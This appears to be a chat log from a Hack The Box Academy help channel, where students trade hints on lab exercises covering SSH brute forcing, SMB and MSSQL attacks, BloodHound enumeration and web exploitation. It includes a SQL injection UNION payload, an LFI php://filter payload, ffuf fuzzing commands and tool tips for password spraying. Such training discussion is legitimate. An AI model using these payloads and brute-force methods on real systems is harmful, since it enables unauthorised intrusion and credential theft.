389/udp open|filtered ldap
500/udp open|filtered isakmp
520/udp open|filtered route
2049/udp open|filtered nfs
" could lead to lose alot of time testing other services for me is only ssh interesting at the time right?

Is it though?

idk yet currently found the user dennis and jason might try brute force my way into them

having SSH access is great, but you basically look through everything else before touching SSH

Good start

If you need a nudge on what service to crack; read the target synopsis to narrow down your options

well now that you say im seeing kerberos could be interesting

Wrong

nothing in the module talks about Kerberos

but i need a foothold in the server thats why im going for ssh

lol it does 🙂

Why is your first instinct ssh?

I see another very juicy port to hit with the hammer

it is because its the only service that we learned in remote password attacks

my bad, you're right, but everything sle being on UDP, you're only interested in the three initial ports you got

Perhaps, but did you need to brute ssh at all?

You were given alternative ports to hit every timr

Samba smbd 4.6.2

considering the users you found, I assume you're further down the assessment, or do you not have their passwords?

Hint:this user is smart and doesn't reuse passwords for different services.

Yep

Crackmapexec is a friend here

thank you very much guys

you don’t need to bruteforce

😉

I didn't use crackmapexec either, but it can be used for sure

Mostly bc I don't think hydra has an smb module

Fair

I'm just saying an idea

😉

Because he's literally just digging at arguably the roughest brick wall without thinking: "surely there's an easier way"

And even then I don't think the ssh password is in the password lists

So spending who knows how long

Can relate to that

Exploit the target using what you've learned in this section, then submit the name of the file located in htb-student's Documents folder. stuck here for long time need some hint/help

can't get the shell

have you tried using what you learnt in that section

^

That's usually a good start

that’s what the question said to do

which usually means "hey follow these instructions and maybe change like one or two things to get it to work" ¯_(ツ)_/¯

ez

lul got the password now its time too dig my boys

hello everyone i am new in htb academy

can anyone tell me that how we can see the answers of questions in the modules

to which we have access

awesome

you can’t

but as i am new i don't know how they want the answers

any idea

or module in which they have intorduced these things

Just start, you’ll see

There’s a foundational path on academy

can u tell me in which module i can see that

you can start with the information security fundamentals module

just go over paths section

and start by starting

but i have bought student subscription

Dont you guys think if he is teally beginner he need to start with thm to get some basics

i am not begineer brother

but you’re new

you can say that 🙂

as i am new in here

thanks boss this was really helpfull 🙂

Im stuck on the Active Directory BloodHound module. I need to find the rights that sarah has over nicole. So far I believe I have found them but it says they are not correct. Is there anybody who has done this module who can help?

I can DM about other things I have tried so far.

set your event code to filter out more stuff

Is there any hint about next module

@acoustic owl can I dm you regarding the HTTP Attacks module?

sure

Two modules should therefore still come

If you still need help, you can send me a DM.

hello am new here

question about how learning modules are structured - are they intended to build on each other one after the other or are they intended to be self-contained?

There are modules that build on the knowledge of other modules. But there are also modules that are self-contained.

many thanks!

Most modules will at least build off the fundamentals (obviously)

I just finished the CBBH path, is Modern Web Exploitation Techniques a good module to unlock for further deepening my knowledge?

Go for Whitebox Attacks first I would say

I mean I'd assume so, but if you're planning to take the exam I'd try and avoid the more advanced modules for now. As you can overprepare yourself - and overthink simple things.

Not really thinking about the exam rn, as I don´t need it for job roles

Just doing the academy for knowledge for now

That's fair lol and (unless they add content) you'll be fine to come back to it whenever and do it

I know a a little bit about prototype pollution, but the rest seems interesting.. I´ll go for whitebox for now

Hi! i'm on SQL injection module, in the exploitation part, can i know why, in the SQL statements, the course say to use cn ' ... <SNIP>, i don't understand specifically the cn string, is there a particular reason?

This is an example:
||cn' UNION select 1,database(),2,3-- -||

cn is just cause its a valid search query for that particular search functionality that youre injecting into

So it's not mandatory? Have not much experience with SQL injections but i've never seen it on a statement

cn isnt sql specific or anything

its just that for that injection youd like to have a valid result returned by the query

(you may be able to cut it entirely, idr)

cn is just a country name for that table, you could swap it for anything else in that page

ok ok makes sense, thanks for the explanation!

Can someone compare notes with me on AD Enum and Attacks skills assessment 2?

yeah

i had to reset the machine it work then

before it was giving the error

sure dm me

On the Cross Sire Scripting, XSS Discovery has anyone got the answer to question 2 that is accepted?

Hello guys, been stuck for several hours on AD Enum & Attack Skills assessment Part 2 :

Question

Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.

I tried to catch MSSQLSVC hash via responder and xp_dirtree, but for every hash i got with that (||starting with SQL01$::INLANEFREIGHT:...|| i have hashcat which exhaust 😂

Is there someone who can hint me plz ?

hi guys!

Privileged Access module in Ad i cannot import to bloodhound

can someone help me how to do that? never used it before

what other things can you try with Mssql apart from catching the hash? 🤔

Command exec & impersonation

I tried command exec to get a revshell but found nothing so i tried to catch the hash with some hope x)

did you get the shell?

yes

then keep looking after, check your privileges

hm... gonna back on this shell... ty boyz !

i am starting neo4j database but nothing is inside

Look up a guide

i am running ./SharpHound Invoke-BloodHound - CollectionMethod All command but it does not find anything

You have to import the data after its collected

the neo4j db wont automagically know

usually collectors have an option to output to a zip file and then you can just import the zip file, its a bit easier that way

What host can this user access via WinRM? (just the computer name)

however i change the answer it does not accept

i ran the query from the example

only showed 1 result

what am i doing wrong?

i have found 5 hosts in the network no one is accepted as a good answer

have you tried stripping the domain name?

striping?

removing

Stripping

yes

Striping is a different word

ACADEMY-EA-DC01 i did like this, tried just DC01, EA-DC01

and with all the other hosts too

Make sure you have no spaces at the beginning and ending of your answer

my bad

which section again

ah yup. make sure you dont have extra spaces

one of those is 100% correct

okey

thx

Hi, about Skills Assessment - Service Login first question, I generated a usernames list and a passwords list according to the requirements, and the number of total ssh login tries is around 100,000, I am getting no hit and it could take forever.
Could I get a hint how to reduce the lists ? or how long it should take ?

check the hint

you should have no more than 15 users tho if you used username-anarchy

I used UsernameGenerator as required

idk what is that

i use username-anarchy

Ok will try. I went with the requirement : "Also use 'usernameGenerator' to generate potential usernames for the employee. "

wth is usernameGenerator

https://github.com/florianges/UsernameGenerator

??? 2 stars

use what you learned in the module

I know, but why would they recommend it then ? it works ok

I mean if it works it works

yea xD you got no luck with it

you can brute force 100.000 tries with ssh

not feasible

cant**

yes you can

It's feasible, there's a tool that makes it better

I forget the name

just depends on if you wanna risk dos'ing the ssh server

ssb

I need to install it

AH cool lets break the server then

it works when it doesnt murder the server lmao

the defaults are just really aggressive, can def tone it down

yes hydra tells you to adjust it

it also doesnt auto stop when it finds a success

its still 1000x faster than hydra

(and I dont think Im even being facetious)

anyways for that skill assessment you use username-anarchy and basic info about the user you find on google with cupp

it takes less than 1 minute to brute force it

Do you use -u to take less than 1 minute ?

obviously otherwise it tries all passwords for 1 user

and then go with the next user

with -u it tries all user with 1 password

great, it took a few seconds with -u ...

well next time use what you learned 😄

https://github.com/pwnesia/ssb this is the tool I was talking about ftr

thanks gonna be great to use it

-u just changes the order, you cannot know in advance if it will take less or more time

what order?

-u loops around users

instead of looping around passwords

yes you can infere that it will find the combination quicker if you loop around the shortest list

in this case the users one

you can make the maths behind my assertion

yeah on avg that will be shorter

unless the password list is weighted to the top with higher likelihoods

in which case shit gets funky

rockyou case iirc

https://academy.hackthebox.com/module/23/section/1492

The http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=config is not working

because it is not config

you have to fuzz the site

by using seclists directory 2.3 medium right ?

i think its a good list

in module its given directory 2.3 medium

🤷‍♂️

this ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://<SERVER_IP>:<PORT>/FUZZ.php

I dont remember needing to fuzz. it but you def can

hmm

the question itself asks you to fuzz it

mb then

you can always guess the name tho

xD

im trying xd

just fuzz haha

why its fuzzing the file why not parameter

coz u want to read a .php file with a credential in it

but you dont know the name of the file

hm yeah

👌

you can fuzz the parameter if you want to

it doesnt make a huge difference

fuzzing parameter is theoretically even better because there could be files the LFI could read that the web server would deny access to directly.

those are shown if you use default ffuf config

yeah it doesnt matter

it prints 403 along with 200